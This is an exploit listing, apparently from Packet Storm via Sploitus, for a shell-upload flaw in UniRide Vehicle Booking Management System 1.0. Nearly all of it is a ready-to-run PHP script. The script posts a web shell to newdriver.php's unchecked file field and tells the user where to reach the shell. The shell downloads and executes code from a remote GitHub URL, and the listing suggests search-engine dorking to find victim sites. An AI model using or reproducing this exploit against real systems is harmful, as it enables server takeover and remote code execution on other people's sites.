Exploit for UniRide Vehicle Booking Management System 1.0 Shell Upload

Name: Exploit for UniRide Vehicle Booking Management System 1.0 Shell Upload
Rating: 5 (47 reviews)
2025-03-12 | CVSS 7.5
## https://sploitus.com/exploit?id=PACKETSTORM:189751
=============================================================================================================================================
    | # Title     : UniRide Vehicle Booking Management System 1.0 Code Injection Vulnerability                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
    | # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202303/kashipara.com_vehicle-management-zip.zip               |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] uses the CURL to Allow Remotely upload and run malicious file .
    
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php target.dz
    
    [+] PayLoad :
    
    <?php
    
    function file_upload($target_ip) {
        $file_name = "indoushka.php";
        $webshell_payload = "<?php
            \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';
            \$ch = curl_init();
            curl_setopt(\$ch, CURLOPT_URL, \$url);
            curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);
            \$output = curl_exec(\$ch);
            curl_close(\$ch);
            if (\$output) {
                include 'data://text/plain;base64,' . base64_encode(\$output);
            }
        ?>";
    
        $post_fields = array(
            
            'submit' => '',
            'drname' => 'indoushka',
            'drjoin' => '16/12/1986',
            'drmobile' => '0771818860',
            'drnid' => '336699',
            'drlicense' => '2009-2024',
            'drlicensevalid' => 'yes',
            'draddress' => 'yes',
    		'file' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),
    		
            'qty' => '1'
        );
    
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "$target_ip/newdriver.php");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
        $response = curl_exec($ch);
        curl_close($ch);
    
        echo "(+) Shell uploaded successfully.\n";
        echo "(+) Access the shell at: $target_ip/picture/\n";
    }
    
    if ($argc != 2) {
        echo "(+) Usage: php " . $argv[0] . " <target ip>\n";
        echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";
        exit(-1);
    }
    
    $target_ip = $argv[1];
    file_upload($target_ip);
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================